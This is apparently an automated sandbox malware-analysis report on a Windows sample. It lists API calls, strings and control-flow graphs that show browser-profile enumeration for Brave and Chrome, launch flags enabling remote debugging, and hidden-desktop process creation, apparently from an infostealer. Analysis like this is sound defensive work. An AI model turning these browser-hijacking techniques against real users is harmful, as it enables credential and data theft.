                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
                                                                                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
                                                                                                Strings
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                                                                • API String ID: 2127927946-2218711628
                                                                                                • Opcode ID: 5eea1aac99bf7e535a43d37b45fc3319ad1af7de06c44669e1522cdce20b9fba
                                                                                                • Instruction ID: ab2078f5f47aa6eaeaf83cafc0758b5ab509dada1718e255d3e4d65f54e1cbb6
                                                                                                • Opcode Fuzzy Hash: 5eea1aac99bf7e535a43d37b45fc3319ad1af7de06c44669e1522cdce20b9fba
                                                                                                • Instruction Fuzzy Hash: BA413F79740624ABD7109FE5FC4DADCBF70AB4C701BA08062F90A99190C7F993859B7D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 960 40be40-40bed2 call 41aa50 call 41ac30 call 41acc0 call 41abb0 call 41ab10 * 2 call 41aa50 * 2 call 41ade0 FindFirstFileA 979 40bed4-40bf22 call 41ab10 * 6 call 401550 call 41ab10 * 2 960->979 980 40bf27-40bf3b StrCmpCA 960->980 1035 40c90f-40c912 979->1035 982 40bf53 980->982 983 40bf3d-40bf51 StrCmpCA 980->983 985 40c89e-40c8b1 FindNextFileA 982->985 983->982 986 40bf58-40bfd1 call 41ab30 call 41ac30 call 41acc0 * 2 call 41abb0 call 41ab10 * 3 983->986 985->980 989 40c8b7-40c8c4 FindClose call 41ab10 985->989 1036 40c062-40c0e3 call 41acc0 * 4 call 41abb0 call 41ab10 * 4 986->1036 1037 40bfd7-40c05d call 41acc0 * 4 call 41abb0 call 41ab10 * 4 986->1037 995 40c8c9-40c90a call 41ab10 * 5 call 401550 call 41ab10 * 2 989->995 995->1035 1075 40c0e8-40c0fe call 41ade0 StrCmpCA 1036->1075 1037->1075 1078 40c104-40c118 StrCmpCA 1075->1078 1079 40c2c5-40c2db StrCmpCA 1075->1079 1078->1079 1080 40c11e-40c238 call 41aa50 call 418cf0 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 3 call 41ade0 * 2 CopyFileA call 41aa50 call 41acc0 * 2 call 41abb0 call 41ab10 * 2 call 41aab0 call 40a110 1078->1080 1081 40c330-40c346 StrCmpCA 1079->1081 1082 40c2dd-40c320 call 401590 call 41aab0 * 3 call 40a990 1079->1082 1246 40c287-40c2c0 call 41ade0 DeleteFileA call 41ad50 call 41ade0 call 41ab10 * 2 1080->1246 1247 40c23a-40c282 call 41aab0 call 401590 call 4153e0 call 41ab10 1080->1247 1084 40c40a-40c422 call 41aab0 call 418f20 1081->1084 1085 40c34c-40c363 call 41ade0 StrCmpCA 1081->1085 1143 40c325-40c32b 1082->1143 1109 40c428-40c42f 1084->1109 1110 40c58a-40c59f StrCmpCA 1084->1110 1096 40c405 1085->1096 1097 40c369-40c3ff memset call 41ade0 lstrcatA call 41ade0 lstrcatA * 2 call 41ade0 * 3 call 401590 call 409e30 1085->1097 1102 40c7fe-40c807 1096->1102 1097->1096 1106 40c80d-40c883 call 41aab0 * 2 call 401590 call 41aab0 * 2 call 41aa50 call 40be40 1102->1106 1107 40c88e-40c899 call 41ad50 * 2 1102->1107 1211 40c888 1106->1211 1107->985 1119 40c435-40c43c 1109->1119 1120 40c4eb-40c57a memset call 41ade0 lstrcatA call 41ade0 lstrcatA * 2 call 41ade0 * 2 call 401590 call 409e30 1109->1120 1117 40c792-40c7a7 StrCmpCA 1110->1117 1118 40c5a5-40c70e call 41aa50 call 41acc0 call 41abb0 call 41ab10 call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41ade0 * 2 CopyFileA call 401590 call 41aab0 * 3 call 40aec0 call 401590 call 41aab0 * 3 call 40b4c0 call 41ade0 StrCmpCA 1110->1118 1117->1102 1127 40c7a9-40c7f3 call 401590 call 41aab0 * 3 call 40b200 1117->1127 1279 40c710-40c75d call 401590 call 41aab0 * 3 call 40ba50 1118->1279 1280 40c768-40c780 call 41ade0 DeleteFileA call 41ad50 1118->1280 1128 40c442-40c4e0 memset call 41ade0 lstrcatA call 41ade0 lstrcatA * 2 call 41ade0 * 2 call 401590 call 409e30 1119->1128 1129 40c4e6 1119->1129 1207 40c57f 1120->1207 1202 40c7f8 1127->1202 1128->1129 1138 40c585 1129->1138 1138->1102 1143->1102 1202->1102 1207->1138 1211->1107 1246->1079 1247->1246 1296 40c762 1279->1296 1287 40c785-40c790 call 41ab10 1280->1287 1287->1102 1296->1280
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0040BEC5
                                                                                                • StrCmpCA.SHLWAPI(?,00421454), ref: 0040BF33
                                                                                                • StrCmpCA.SHLWAPI(?,00421458), ref: 0040BF49
                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C8A9
                                                                                                • FindClose.KERNEL32(000000FF), ref: 0040C8BB
                                                                                                Strings
                                                                                                • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C495
                                                                                                • Brave, xrefs: 0040C0E8
                                                                                                • \Brave\Preferences, xrefs: 0040C1C1
                                                                                                • Preferences, xrefs: 0040C104
                                                                                                • Google Chrome, xrefs: 0040C6F8
                                                                                                • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C534
                                                                                                • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C3B2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                • API String ID: 3334442632-1869280968
                                                                                                • Opcode ID: 20d43af49ac8ce4d1e33b895b6731e7b2aad3236febdf6d8fc1bb9c658583540
                                                                                                • Instruction ID: 94c18d54b217f3a33de79012ae3cbc39d408ee074d55138b38aa149d1ce8c153
                                                                                                • Opcode Fuzzy Hash: 20d43af49ac8ce4d1e33b895b6731e7b2aad3236febdf6d8fc1bb9c658583540
                                                                                                • Instruction Fuzzy Hash: 5C52A871A011049BCB14FB61DC96EEE733DAF54304F4045AEF50A66091EF386B98CFAA

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 00414B7C
                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                                                                • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                                                                • FindClose.KERNEL32(000000FF), ref: 00414DE2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                • String ID: %s\%s$%s\%s$%s\*$-SA
                                                                                                • API String ID: 180737720-309722913
                                                                                                • Opcode ID: 9989705b10511079cbc1c9db8c5933311762cc962bdf51fd0f19e0690b846a51
                                                                                                • Instruction ID: 6eceda3e2f2aeeb228f448c6629b31eb3c314648a2220d8d34325ba683034fba
                                                                                                • Opcode Fuzzy Hash: 9989705b10511079cbc1c9db8c5933311762cc962bdf51fd0f19e0690b846a51
                                                                                                • Instruction Fuzzy Hash: F2617771904218ABCB20EBA0ED45FEA737DBF48701F40458EF60996191FB74AB84CF95

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 00409E47
                                                                                                  • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00976A20,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                • wsprintfA.USER32 ref: 00409E7F
                                                                                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
                                                                                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
                                                                                                • memset.MSVCRT ref: 00409EED
                                                                                                • lstrcatA.KERNEL32(00000000,?), ref: 00409F03
                                                                                                • lstrcatA.KERNEL32(00000000,?), ref: 00409F17
                                                                                                • lstrcatA.KERNEL32(00000000,004212D8), ref: 00409F29
                                                                                                • memset.MSVCRT ref: 00409F3D
                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409F7C
                                                                                                • memset.MSVCRT ref: 00409F9C
                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
                                                                                                • Sleep.KERNEL32(00001388), ref: 0040A013
                                                                                                • CloseDesktop.USER32(00000000), ref: 0040A060
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
                                                                                                • String ID: D
                                                                                                • API String ID: 1347862506-2746444292
                                                                                                • Opcode ID: a3c0d74616739dfe6e649dee9790039705e6b773d6ae131a4489b076431e44aa
                                                                                                • Instruction ID: 9351db1e319cd03a78e50f41365f33c4a7b54471eb3ec1f6bde0cae738676000
                                                                                                • Opcode Fuzzy Hash: a3c0d74616739dfe6e649dee9790039705e6b773d6ae131a4489b076431e44aa
                                                                                                • Instruction Fuzzy Hash: B551B3B1D04318ABDB20DF60DC4AFDA7778AB48704F004599F60DAA2D1EB75AB84CF55
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 00414113
                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 0041412A
                                                                                                • StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
                                                                                                • StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
                                                                                                • FindClose.KERNEL32(000000FF), ref: 004142D1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
